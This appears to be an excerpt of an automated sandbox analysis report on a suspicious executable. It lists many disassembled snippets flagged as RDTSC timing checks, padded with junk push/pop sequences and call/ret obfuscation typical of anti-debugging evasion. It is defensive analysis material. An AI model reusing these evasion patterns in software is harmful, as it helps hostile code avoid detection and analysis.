Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36A848 second address: 36A851 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36A95D second address: 36A96E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F27492B5208h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D841 second address: 36D84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2749204C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D84B second address: 36D894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F27492B5208h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov di, si 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+12460362h], edx 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2D7Fh] 0x00000036 push eax 0x00000037 jng 00007F27492B5210h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F53E second address: 36F542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F542 second address: 36F54B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F54B second address: 36F5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F2749204C28h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 cmc 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007F2749204C28h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 sub ebx, dword ptr [ebp+1247A71Ah] 0x00000048 pushad 0x00000049 mov dword ptr [ebp+122D192Ah], edx 0x0000004f mov bh, cl 0x00000051 popad 0x00000052 push eax 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 pop edi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36DAA1 second address: 36DAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F27492B520Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E863 second address: 36E867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371C67 second address: 371C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36E867 second address: 36E86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A24B1 second address: 3A24B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A24B5 second address: 3A24BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5641 second address: 3A5654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F27492B5208h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5654 second address: 3A5658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5915 second address: 3A5919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A5919 second address: 3A591D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A591D second address: 3A5935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnp 00007F27492B520Ch 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A7E0D second address: 3A7E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A7E15 second address: 3A7E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F27492B5206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F27492B5217h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A7E39 second address: 3A7E4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A79D8 second address: 3A79DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A79DE second address: 3A79E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9555 second address: 3A9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F27492B5217h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9575 second address: 3A9579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9579 second address: 3A9584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A9584 second address: 3A95C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C37h 0x00000009 jng 00007F2749204C26h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F2749204C35h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADB27 second address: 3ADB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5218h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F27492B5216h 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADB61 second address: 3ADB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ADCD9 second address: 3ADCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0C29 second address: 3B0C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0C2D second address: 3B0C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B0DBD second address: 3B0DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jp 00007F2749204C26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B111E second address: 3B1124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1124 second address: 3B1128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1128 second address: 3B1148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F27492B5216h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F37 second address: 3B6F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F3B second address: 3B6F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F27492B5206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F47 second address: 3B6F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6F4D second address: 3B6F5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F27492B5208h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B584C second address: 3B587D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2749204C39h 0x00000007 jnc 00007F2749204C26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F2749204C26h 0x00000017 jnp 00007F2749204C26h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B587D second address: 3B5892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B5BB0 second address: 3B5BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2749204C30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B5BC4 second address: 3B5BD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B5FAC second address: 3B5FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jg 00007F2749204C26h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 362283 second address: 36231E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F27492B520Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F27492B5208h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movsx edx, di 0x0000002a xor dword ptr [ebp+122D2DD3h], edi 0x00000030 mov ebx, dword ptr [ebp+124981A6h] 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F27492B5208h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov dx, D8E6h 0x00000054 add eax, ebx 0x00000056 push 00000000h 0x00000058 push esi 0x00000059 call 00007F27492B5208h 0x0000005e pop esi 0x0000005f mov dword ptr [esp+04h], esi 0x00000063 add dword ptr [esp+04h], 00000016h 0x0000006b inc esi 0x0000006c push esi 0x0000006d ret 0x0000006e pop esi 0x0000006f ret 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push ecx 0x00000074 jmp 00007F27492B520Eh 0x00000079 pop ecx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36231E second address: 362323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B60FF second address: 3B612F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27492B5210h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F27492B5214h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B626A second address: 3B6284 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2749204C3Ch 0x00000008 jmp 00007F2749204C30h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6284 second address: 3B62AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F27492B5210h 0x0000000f jmp 00007F27492B520Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B62AB second address: 3B62BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2749204C2Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B62BF second address: 3B62C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B62C3 second address: 3B62C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6C9C second address: 3B6CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF147 second address: 3BF14E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF14E second address: 3BF157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF157 second address: 3BF15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF15B second address: 3BF15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BD62C second address: 3BD638 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2749204C2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE123 second address: 3BE12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE12B second address: 3BE130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE130 second address: 3BE155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B520Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F27492B5213h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE155 second address: 3BE159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE159 second address: 3BE15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BE488 second address: 3BE49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2749204C2Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB47 second address: 3BEB4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB4D second address: 3BEB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB53 second address: 3BEB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB58 second address: 3BEB5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BEB5E second address: 3BEB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C79DA second address: 3C79F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2749204C2Fh 0x00000009 jnl 00007F2749204C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7CE3 second address: 3C7CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7E23 second address: 3C7E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C7E29 second address: 3C7E57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27492B5211h 0x00000008 jmp 00007F27492B5218h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C82BD second address: 3C82C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3C82C1 second address: 3C82E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F27492B5219h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D05C0 second address: 3D05C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D05C7 second address: 3D05D1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F27492B520Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE677 second address: 3CE683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F2749204C26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE683 second address: 3CE687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CE807 second address: 3CE80C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAE7 second address: 3CEAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAEE second address: 3CEAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAF4 second address: 3CEAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAFA second address: 3CEAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEAFF second address: 3CEB1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F27492B5206h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27492B520Dh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CEB1A second address: 3CEB3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2749204C26h 0x00000008 jne 00007F2749204C26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jns 00007F2749204C2Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF0A0 second address: 3CF0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF0A9 second address: 3CF0D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2749204C2Bh 0x00000008 jmp 00007F2749204C34h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF3D9 second address: 3CF3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D041D second address: 3D0423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D0423 second address: 3D0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D0428 second address: 3D042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D042E second address: 3D044E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F27492B5206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F27492B520Bh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 js 00007F27492B520Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D044E second address: 3D045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D045A second address: 3D045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D9154 second address: 3D916B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2749204C26h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jg 00007F2749204C26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
